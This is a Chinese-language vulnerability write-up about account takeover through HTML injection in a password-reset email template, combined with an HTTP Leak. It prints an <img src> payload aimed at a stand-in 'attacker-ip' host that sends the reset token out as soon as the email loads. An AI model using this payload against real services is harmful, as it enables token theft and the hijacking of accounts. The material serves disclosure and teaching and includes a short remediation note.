怎么通過密碼重置功能構造HTTP Leak實現任意賬戶劫持

怎么通過密碼重置功能構造HTTP Leak實現任意賬戶劫持，很多新手對此不是很清楚，為了幫助大家解決這個難題，下面小編將為大家詳細講解，有這方面需求的人可以來學習下，希望你能有所收獲。

密碼重置請求中的HTML注入

在針對目標應用服務的密碼重置功能測試過程中，我發現在服務端和我的重置密碼測試賬戶之間存在以下POST請求，即它會自動向重置密碼的用戶郵箱發送以下郵件，提醒用戶點擊相應的重置鏈接[RESET LINK]去修改密碼，該請求是一個HTML郵件格式：

仔細看，可以發現，其中的emailBody使用的是模板樣式，所以，接下來，我們就來看看這里它能不能被利用，能否向其中注入一些東西。因此，我在其中插入了一個<a>標簽內容，如下：

這樣一來，在我的重置密碼測試用戶郵箱中，收到了以下郵件，注意看，在我新添加的click之后，是密碼重置需要點擊的密碼修改鏈接，也就是POST請求中的[RESET-LINK]：
很明顯，目標應用服務未對HTML郵件模板的用戶輸入做安全過濾，導致emailBody元素可被攻擊者控制，這是一種典型的HTML注入漏洞。但在這里，能產生什么影響呢? 此時，我突然想到了HTTP Leak攻擊方法，可以用這種方式來看看是否存在相關的信息泄露，或許能在其中獲取到對應賬戶的密碼重置Token。 

HTTP Leak攻擊簡介

當前Web技術下包含了大量HTML元素和屬性，這些HTML元素和屬性會請求一些外部資源，而在它們的HTTP請求過程中，可能存在潛在的敏感信息泄露。為此，德國著名網絡安全公司Cure53發起了名為HTTP Leaks的攻擊方法研究項目（項目參見Github -HttpLeaks），其攻擊方法目的在于，枚舉出各類HTTP請求中可能存在的信息泄露問題。

另外，某些場景下，還能利用HTTP Leak繞過CSP防護機制，如@filedescriptor的《CSP 2015》，以及@intidc大神的《HTML injection can lead to data theft》。

就比如，在HTTP請求涉及的一些HTML郵件格式中，如果存在HTTP Leak問題，那么，可以利用它來知道收信人是否打開或者閱讀了郵件；還有一些Web代理工具，它們聲稱可以用“匿名”的方式去訪問某些網站，但一些HTML元素或屬性的重寫過程中，就會涉及到外部資源的HTTP請求，如果這其中存在信息泄露問題，那么，其聲稱的“匿名”保護也就無從談起了。

構造HTTP Leak攻擊Payload

在此，我們需要了解HTML郵件格式模板（可點此查看Email Templates），其中的密碼重置請求模板如下：

---
Subject: Retrieve your password on {{ settings.businessAddress.company }}.
---
<!DOCTYPE html>
<html>
<head>
</head>
<body >
<div>
    <p>
        You have requested a password reset, please follow the link below to reset your password.
    </p>
    <p>
        Please ignore this email if you did not request a password change.
    </p>
    <p>
        <a href="{{ RESET-LINK }}">
            Follow this link to reset your password.
        </a>
    </p>
</div>
</body>
</html>

結合前述密碼重置請求的HTML郵件格式注入漏洞，我們可以在[RESE-TLINK]之前插入以下格式的Payload：

<img src=\"http://attacker-ip/?id=

注意看，這種插入最后就形成了：

<img src=\"http://attacker-ip/?id="{{ RESET-LINK }}"

其中，第一對雙引號的閉合區間 "http://attacker-ip/?id=" 成為了最終的密碼重置點擊鏈接，也就是說，受害者收到密碼重置請求郵件后，他點擊的密碼重置鏈接將會是攻擊者控制的網站http://attacker-ip/，這樣一來，目標應用產生的密碼重置token就會發送到攻擊者控制的網站http://attacker-ip/。

這里，由于插入的<img src=\"http://attacker-ip/?id= 偽裝成一張圖片元素，所以，實際上，只要受害者打開密碼重置請求郵件，不需要點擊其中的重置鏈接，當郵件體發起圖片加載時，就能自動請求攻擊者網站，實現密碼重置token向http://attacker-ip/的發送，如下：

漏洞影響

獲得了其他賬戶的密碼重置token，那么就可以間接操作，實現對其他賬戶的劫持了。目前，就從我的測試來看，除Gmail 和Yahoo外，有很多主流的郵件服務商大多都存在這種HTML注入+HTTP Leak的問題，從防護層面來說，需要對HTML郵件模板的用戶可輸入和編輯功能進行安全過濾檢查。

看完上述內容是否對您有幫助呢？如果還想對相關知識有進一步的了解或閱讀更多相關文章，請關注億速云行業資訊頻道，感謝您對億速云的支持。